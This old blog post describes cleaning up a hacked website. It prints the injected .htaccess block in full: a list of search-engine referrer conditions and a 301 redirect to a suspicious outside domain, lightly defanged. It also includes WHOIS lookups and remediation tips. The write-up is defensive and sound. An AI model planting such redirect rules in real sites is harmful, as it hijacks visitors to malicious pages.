Select Page
closeLook how old this is!
I post at SearchCommander.com now, and this post was published 14 years 9 months 30 days ago. This industry changes FAST, so blindly following the advice here *may not* be a good idea! If you're at all unsure, feel free to hit me up on Twitter and ask.

We just fixed an instance of a domain which appeared fine when visited directly, but when coming from the search results, all users were being redirected.

Because of my recent personal virus experience  redirecting my visits from search results I was thrown off at first,  but it turned out that all users coming from search engines to that website were being redirected in a completely different way.

I found that the following code was placed in the .htaccess file at the root of the domain. :

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*

RewriteRule ^(.*)$ http;//sudnijdenprishel.com/gold/go.php?sid=6 [R=301,L]

(* note that I replaced the colon with a semicolon in the above url)

You can see what was happening here. the .htaccess file was either hacked, or came from the web designers computer, and it was causing all users being referred by any search engines listed to be reduirected to the sudnijdenprishel.com.

I looked up the Who-is info for sudnijdenprishel.com and found this, showing the domain is brand new:

Registrant:
PrivacyProtect.org
Domain Admin ([email protected])
P.O. Box 97
Note – All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 21-Jan-2010
Expiration Date: 21-Jan-2011

Domain servers in listed order:
ns2.jino.ru
ns1.jino.ru

Since my search was being stymied by privacy, I tried looking up WHOIS information for jino.ru :

[Querying whois.ripn.net]
[whois.ripn.net]
By submitting a query to RIPN’s Whois Service

domain: JINO.RU
type: CORPORATE
nserver: ns1.jino.ru. 217.107.34.200
nserver: ns2.jino.ru. 217.107.217.16
nserver: ns3.jino.ru. 217.107.219.170
state: REGISTERED, DELEGATED, VERIFIED
org: Avguro Technologies, Ltd.
phone: +7 495 2293031
fax-no: +7 495 2293031
e-mail: [email protected]
e-mail: [email protected]
registrar: R01-REG-RIPN
created: 2002.11.27
paid-till: 2010.11.28
source: TCI

and fropm there, it’s not worth chasing down further, because I’m not Skyping into Kazakhstan.

Anyway, if users claim they’re being redirected, do these things:

  1. Check your website .htaccess file
  2. Scan your computer for any viruses, in case you’re the source in the first place, which is often the case.
  3. Change your FTP usernames and passwords to good ones (from a clean computer) just in case your password was hacked.
If you like what you've seen here, would you please share this?